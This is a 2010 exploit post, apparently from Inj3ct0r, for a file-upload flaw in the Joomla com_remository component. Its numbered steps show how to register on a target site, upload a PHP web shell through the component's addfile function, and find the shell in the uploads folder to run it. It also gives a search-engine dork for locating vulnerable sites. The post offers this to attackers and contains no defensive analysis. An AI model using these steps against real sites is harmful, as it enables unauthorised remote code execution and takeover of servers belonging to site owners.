Home / os / win7

Joomla Component com_remository Remote Upload File

Posted on 26 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_remository Remote Upload File</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================
Joomla Component com_remository Remote Upload File
==================================================

#################################################################
#                           I N F O
#
# Exploit Title: Joomla com_remository Remote Upload File
# Date: 2010-08-26
# Author: J3yk0ob
# Home  : http://www.J3yk0ob.com
#
#################################################################
#                        E X P L O I T
#
#  1. Register On Site
#
#  2. http://www.Target.com/index.php?option=com_remository&amp;Itemid=[Itemid]&amp;func=addfile
#
#  3. Add your php file , example : shell.php
#
#  4. http://www.Target.com/components/com_remository_files/
#
#  5. If web server alowe to see directory you can see folder example : file_image_2
#
#  6. You can find your shell in lates file_image_[latest Number]
#
#  7 . Example URL : http://www.example.com/components/com_remository_files/file_image_14/1276100016shell.php
#
#  Dork : inurl:&quot;index.php?com_remository&quot;
#
#################################################################
# Contact Me
#
# Home : http://www.J3yk0ob.com
# Email : 4dm1n@J3yk0ob.com
#
##################################################################


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :